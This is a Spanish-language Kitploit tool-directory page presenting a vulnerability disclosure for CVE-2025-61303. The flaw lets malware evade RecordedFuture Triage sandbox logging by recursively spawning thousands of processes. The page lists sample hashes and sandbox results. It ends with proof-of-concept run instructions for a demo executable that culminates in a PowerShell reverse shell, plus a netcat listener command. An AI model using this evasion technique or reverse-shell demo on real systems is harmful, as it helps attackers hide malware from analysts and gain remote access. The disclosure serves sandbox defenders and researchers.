Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61303 — Vulnerabilidad Crítica (9.8) - El motor de análisis dinámico RecordedFuture Triage puede fallar al registrar comportamiento malicioso cuando las muestras producen bifurcación de procesos recursiva de muy alto volumen, causando informes de comportamiento inconsistentes o faltantes. | Kitploit
Herramientas/GitHubGitHub/egkritsis/cve-2025-61303
Análisis Dinámico (Sandboxing)Análisis de VulnerabilidadesExplotaciónAnálisis de MalwarePapers e InvestigaciónAprendizaje y Educación
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
211hace 10 mesesAún no revisado

Acerca de

Vulnerabilidad Crítica (9.8) - El motor de análisis dinámico RecordedFuture Triage puede fallar al registrar comportamiento malicioso cuando las muestras producen bifurcación de procesos recursiva de muy alto volumen, causando informes de comportamiento inconsistentes o faltantes.

Compartir

CVE-2025-61303 - RecordedFuture Triage: Denegación de Análisis mediante Bifurcación Recursiva de Procesos

Descripción

El sandbox RecordedFuture Triage en Windows 10 build 2004 y Windows 10 LTSC 2021 contiene una vulnerabilidad crítica en su motor de análisis de comportamiento de Windows que permite que una muestra de malware enviada evite la detección y cause denegación de análisis. La vulnerabilidad se desencadena cuando una muestra genera recursivamente una gran cantidad de procesos hijos, generando un alto volumen de registros y agotando los recursos del sistema. Como resultado, el comportamiento malicioso clave, incluyendo la ejecución de PowerShell y la actividad de shell inversa, puede no ser registrado o reportado, engañando a los analistas y comprometiendo la integridad y disponibilidad de los resultados del análisis en el sandbox.


Puntuación CVSS

CVSS v3.1: 9.8 (Crítico)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Autores / Investigadores

  • Evgenios Gkritsis — Departamento de Informática, Universidad de Economía y Negocios de Atenas, Grecia
  • Constantinos Patsakis — Departamento de Informática, Universidad del Pireo, Grecia
  • George Stergiopoulos — Departamento de Informática, Universidad de Economía y Negocios de Atenas, Grecia

Detalles

La muestra vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) demuestra una condición de denegación de análisis en el motor de análisis de comportamiento de Windows de RecordedFuture Triage.
Cuando se detona bajo configuraciones de Windows 10, la muestra genera recursivamente miles de procesos hijos, agotando los recursos de seguimiento de procesos y registro. Como resultado, el sandbox reporta datos mínimos de comportamiento y no registra acciones maliciosas clave.


Entorno Windows 10 v2004

  • Plataforma: win10v2004-20250610-en
  • Arquitectura: x64
  • Tiempo máximo del kernel: 104s
  • Tiempo máximo de red: 213s
  • Puntuación de comportamiento reportada: 1/10
  • Firma detectada: “Uso sospechoso de WriteProcessMemory” (64 IoCs)
  • Comportamiento observado:
    • Recursión continua de procesos de vathos_rev.exe
    • No se registró ejecución de PowerShell ni actividad de shell inversa
    • Tráfico de red limitado (solo solicitudes estándar de DNS y HTTP)
    • No se capturaron callbacks de C2 ni telemetría de payloads

Entorno Windows 10 LTSC 2021

  • Plataforma: win10ltsc2021-20250619-en
  • Arquitectura: x64
  • Tiempo máximo del kernel: 105s
  • Tiempo máximo de red: 215s
  • Puntuación de comportamiento reportada: 1/10
  • Firma detectada: “Uso sospechoso de WriteProcessMemory” (64 IoCs)
  • Actividad de procesos observada:
    • Recursión continua de procesos de vathos_rev.exe
    • No se registró ejecución de PowerShell ni actividad de shell inversa
    • Tráfico de red limitado (solo solicitudes estándar de DNS y HTTP)
    • No se capturaron callbacks de C2 ni telemetría de payloads

En ambos entornos sandbox de Windows 10, la detonación no logró capturar las etapas esperadas de ejecución de PowerShell y shell inversa, a pesar de que el malware ejecutó estos comportamientos en el host.

El motor de análisis de comportamiento del sandbox se saturó por la generación recursiva de procesos, resultando en telemetría truncada o faltante.

Esto confirma una vulnerabilidad de denegación de análisis: el motor de comportamiento no reporta actividad maliciosa bajo alta recursión y volumen de registros, lo que lleva a falsos negativos y resultados forenses incompletos.

Referencia del informe público:
https://tria.ge/250822-qfystshk51


Impacto

Esta es una vulnerabilidad de denegación de análisis en RecordedFuture Triage que puede causar que el motor de análisis dinámico no capture o reporte la actividad de comportamiento. La explotación permite a los adversarios eludir la detección de comportamiento y producir informes de análisis incompletos o faltantes.

Impactos clave

  • Evasión de detección: El comportamiento malicioso puede no registrarse, haciendo que las amenazas parezcan benignas.
  • Falsa confianza: Los análisis con puntuaciones bajas y telemetría faltante pueden engañar a los analistas.
  • Evasión reutilizable: La técnica puede integrarse en cargadores/droppers y reutilizarse en campañas.
  • Facilidad de explotación: Reproducible sin conocimientos profundos, aumentando el riesgo de abuso masivo.

Consecuencias secundarias

  • IoCs no detectados
  • Clasificación errónea de amenazas avanzadas
  • Líneas de tiempo forenses incompletas

Productos Afectados

  • Producto: RecordedFuture Triage (Plataforma de Análisis Dinámico)
  • Componente Afectado: Motor de Análisis de Comportamiento de Windows
  • Muestra de Malware: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • Tamaño: 270 KB

Detonaciones Vulnerables Observadas (Informes Públicos de Triage)

Entorno Windows 10 LTSC 2021

  • ID del Informe: 250822-qfystshk51
  • Plataforma: win10ltsc2021-20250619-en
  • Arquitectura: x64
  • Enviado: 2025-08-22 13:12 UTC
  • Reportado: 2025-08-22 13:18 UTC

Entorno Windows 10 Versión 2004

  • ID del Informe: 250822-qfystshk51
  • Plataforma: win10v2004-20250610-en
  • Arquitectura: x64
  • Enviado: 2025-08-22 13:12 UTC
  • Reportado: 2025-08-22 13:18 UTC

Nota: Los detalles de la compilación del motor y la versión interna no se exponen públicamente por RecordedFuture.
Todas las observaciones se basan en detonaciones públicas reproducibles de la plataforma Triage de RecordedFuture (envío 250822-qfystshk51).


Prueba de Concepto (PoC)

Resumen (breve)

La demostración suministrada reproduce la condición de denegación de análisis (DoA) generando un volumen muy alto de procesos y actividad de ejecución profundamente anidada. La demo genera muchos procesos hijos y realiza descifrado XOR de múltiples rondas antes de una etapa final de shell inversa de PowerShell. En imágenes vulnerables de Triage Windows 10, la etapa final del payload no se registra o se trunca, mientras que otras imágenes (por ejemplo, Windows 11) capturan el comportamiento completo.

Cómo ejecutar

poc/vathos_demo.exe <IP> <PUERTO>

Inicie un listener (por ejemplo, nc -lvp 4444) en la IP/puerto especificados para observar los intentos de conexión. La demo genera un número muy alto de procesos y realiza descifrado XOR de múltiples rondas, culminando en una etapa de shell inversa de PowerShell. En configuraciones afectadas de Triage, la etapa final del payload puede no registrarse a pesar de que la muestra la ejecuta en el host.

Figura 1 - Panel de resumen de Triage Figura 1 - Panel de resumen de Triage

Figura 2 - Informe de comportamiento de Windows 10 v2004 (telemetría mínima / ejemplo de DoA) Figura 2 - Informe de win10 v2004 (telemetría mínima)

Descargar herramienta